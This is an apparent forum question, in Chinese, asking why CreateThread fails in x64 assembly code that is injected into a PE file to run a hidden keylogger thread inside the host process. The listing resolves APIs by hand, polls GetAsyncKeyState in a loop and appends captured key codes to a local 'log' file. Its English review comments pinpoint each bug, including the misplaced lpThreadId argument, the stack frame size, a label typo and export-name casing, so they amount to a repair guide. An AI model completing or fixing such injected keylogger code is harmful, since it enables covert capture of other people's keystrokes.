我正在尝试将此代码注入 PE 文件,用 CreateThread 在宿主进程中启动一个键盘记录线程,但 CreateThread 失败并返回 3E6h(ERROR_NOACCESS,十进制 998,"Invalid access to memory location"——通常表示 API 内部访问了无效的内存地址,例如一个无效的输出指针)。我下面源代码中的错误在哪里?
; Injected entry stub (Win64 ABI, FASM-style syntax). Resolves LoadLibraryA
; through MyGetProcAddress, loads USER32.DLL, resolves CreateThread and starts
; KL on a new thread, then falls through to the placeholder bytes below.
;
; NOTE(review): CreateThread takes SIX arguments under the Microsoft x64 ABI:
;   rcx = lpThreadAttributes, rdx = dwStackSize, r8 = lpStartAddress,
;   r9  = lpParameter, [rsp+20h] = dwCreationFlags, [rsp+28h] = lpThreadId.
; Below, &ThreadId is stored into [rsp+20h] (the dwCreationFlags slot) and the
; lpThreadId slot at [rsp+28h] is never written, so the API writes the new
; thread id through whatever stale value sits on the stack there. That is the
; most likely source of the 3E6h / ERROR_NOACCESS ("invalid access to memory
; location") failure. The frame is also one slot short: 32 bytes of shadow
; space plus two stack arguments need 30h bytes, not 28h.
procedure:
sub rsp, 28h                       ; reserves shadow space + 1 slot (see note: 6 args need 30h)
and rsp, 0fffffffffffffff0h        ; NOTE(review): forces 16-byte alignment but the pre-and rsp
                                   ; is not saved, so 'add rsp, 28h' below cannot restore the
                                   ; caller's stack pointer whenever this and actually changed rsp
lea rdx,[loadlibrary7]             ; export name (assumed MyGetProcAddress(rcx=module, rdx=export))
lea rcx,[kernel32dll]
call MyGetProcAddress              ; rax = LoadLibraryA (only if the lookup tolerates the
                                   ; lower-case 'loadlibraryA' spelling -- the export is 'LoadLibraryA')
lea rcx, [user32dll]
call rax                           ; LoadLibraryA("USER32.DLL"); return value is not checked
lea rdx, [createthread7]
lea rcx, [kernel32dll]
call MyGetProcAddress              ; rax = CreateThread
lea rbx,[pThread] ; dead store: overwritten on the next line. rbx is callee-saved
                  ; in the Win64 ABI and is clobbered here without being preserved.
lea rbx,[ThreadId]                 ; ThreadId is not defined in the listing shown
mov qword[rsp+20h], rbx            ; BUG: [rsp+20h] is dwCreationFlags; lpThreadId belongs at [rsp+28h]
lea r9,[Par]                       ; lpParameter = &Par
lea r8,[KL]                        ; lpStartAddress = KL
xor rdx,rdx                        ; dwStackSize = 0 (default stack size)
lea rcx,[SECURITY_ATTRIBUTES_]     ; lpThreadAttributes (struct left with nLength = 0; NULL would be simpler)
call rax                           ; CreateThread(...); rax (handle or NULL) is not checked
add rsp, 28h
db 0 ;JMP to OEP: placeholder bytes for the jump back to the original entry
     ;point, expected to be patched by the injector (not shown here)
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
; KL -- thread start routine passed to CreateThread (signature expected by the
; API: DWORD WINAPI KL(LPVOID lpParameter); rcx = &Par is never read here).
; Polls GetAsyncKeyState over virtual-key codes 8..255 forever; when a key
; reports -32767, appends one byte (the low byte of VIRTUAL_KEY_CODE) to the
; file "log" via msvcrt fopen_s/fwrite/fclose, then restarts the scan.
;
; NOTE(review): this proc never adjusts rsp. A thread entry is reached with
; rsp % 16 == 8 and the Win64 ABI requires the caller to reserve 32 bytes of
; shadow space and keep rsp 16-aligned at every 'call'. Every call below is
; therefore made misaligned and with no shadow space, so callees may spill
; their register arguments over the frame that started this thread.
; NOTE(review): [GETKEYS] is referenced below, but the data section declares
; the label as GEYKEYS -- this will not assemble as written.
proc KL
REPS:
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress              ; rax = LoadLibraryA (re-resolved on every logged key; see jmp REPS)
lea rcx, [user32dll]
call rax                           ; LoadLibraryA("USER32.DLL")
lea rdx, [getasync]
lea rcx, [user32dll]
call MyGetProcAddress              ; rax = GetAsyncKeyState
MOV [GETKEYS],RAX                  ; cache the function pointer (label mismatch: data declares GEYKEYS)
Label001:
mov [VIRTUAL_KEY_CODE],8           ; scan starts at VK 8 (VK_BACK)
L0:
cmp [VIRTUAL_KEY_CODE],255
ja La1                             ; past the last VK code -> restart the scan
mov rcx,[VIRTUAL_KEY_CODE]         ; vKey argument
MOV RAX,[GETKEYS]
call rax                           ; GetAsyncKeyState(vKey)
cmp eax,-32767                     ; NOTE(review): the API returns SHORT; comparing the full
                                   ; 32-bit eax assumes sign-extension the ABI does not guarantee
                                   ; (compare ax / movsx first). -32767 = 8001h: key down + pressed since last call.
MOV RAX,[GETKEYS]                  ; mov preserves flags, so the jz below still sees the cmp result
jz Label1
inc [VIRTUAL_KEY_CODE]
jmp L0
La1:
mov [VIRTUAL_KEY_CODE],8
jmp Label001
Label1:
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress
lea rcx, [msvcrtdll]
call rax                           ; LoadLibraryA("MSVCRT.DLL")
lea rdx, [fopen7]
lea rcx,[msvcrtdll]
call MyGetProcAddress              ; rax = fopen_s
lea r8, [filemode]                 ; "a"
lea rdx, [file_name]               ; "log" (relative path: resolved against the host's current directory)
lea rcx,[fp]                       ; FILE **
call rax ;TO LOG KEYSTROKES        ; fopen_s(&fp, "log", "a"); its errno_t result and fp==NULL are not checked
lea rdx, [fwrite7]
lea rcx,[msvcrtdll]
call MyGetProcAddress              ; rax = fwrite
mov r9,[fp]                        ; stream (may be NULL if fopen_s failed)
mov r8,1                           ; count
mov rdx,1                          ; size: writes only the low byte of VIRTUAL_KEY_CODE
lea rcx, [VIRTUAL_KEY_CODE]
call rax ;TO LOG KEYSTROKES        ; fwrite(&VIRTUAL_KEY_CODE, 1, 1, fp)
lea rdx, [fclose7]
lea rcx,[msvcrtdll]
call MyGetProcAddress              ; rax = fclose
mov rcx,[fp]
call rax                           ; fclose(fp)
jmp REPS                           ; restart from scratch: libraries and exports are re-resolved every time,
                                   ; and a key still held down is logged again on the next pass
endp
; MyGetProcAddress -- body elided by the poster ("...").
; Contract assumed from the call sites above: rcx = module name string,
; rdx = export name string, returns rax = export address. Whether the name
; comparison is case-sensitive is not visible here; it matters for the
; 'loadlibraryA' spelling used in the data section.
proc MyGetProcAddress
...
ret
endp
; Data referenced by the stub and by KL (all NUL-terminated ANSI strings).
kernel32dll db 'KERNEL32.DLL', 0
loadlibrary7 db 'loadlibraryA', 0     ; NOTE(review): the export is 'LoadLibraryA'; a case-sensitive
                                      ; lookup (as GetProcAddress does) will not find this spelling
user32dll db 'USER32.DLL', 0
createthread7 db 'CreateThread', 0
msvcrtdll db 'MSVCRT.DLL', 0
getasync db 'GetAsyncKeyState', 0
fopen7 db 'fopen_s', 0
fwrite7 db 'fwrite',0
fclose7 db 'fclose',0
exitproc7 db 'ExitProcess', 0         ; not referenced in the code shown
filemode db 'a',0                     ; fopen_s mode: append
file_name db 'log',0                  ; relative path, so it lands in the host process's current directory
pThread dq 0                          ; only touched by a dead 'lea' in the stub
; NOTE(review): the real SECURITY_ATTRIBUTES is { DWORD nLength; LPVOID lpSecurityDescriptor;
; BOOL bInheritHandle } with 4 bytes of padding after nLength, i.e. B at offset 8 and a total
; size of 24. Declared this way, B sits at offset 4 (if the assembler's struct does not pad).
; With every field zero the misplacement is harmless today, but nLength should be 24 -- or
; simply pass NULL for lpThreadAttributes.
struct SECURITY_ATTRIBUTES
A dd 0                                ; nLength (left 0)
B dq 0                                ; lpSecurityDescriptor
C dd 0                                ; bInheritHandle
ends
SECURITY_ATTRIBUTES_ SECURITY_ATTRIBUTES
GEYKEYS dq 0                          ; NOTE(review): typo -- the code reads/writes [GETKEYS]; cached GetAsyncKeyState pointer
VIRTUAL_KEY_CODE dq 0                 ; current vKey being polled; only its low byte is written to the log
fp dq 0                               ; FILE* filled in by fopen_s
Par dq 0                              ; lpParameter handed to KL (never read by KL as shown)
...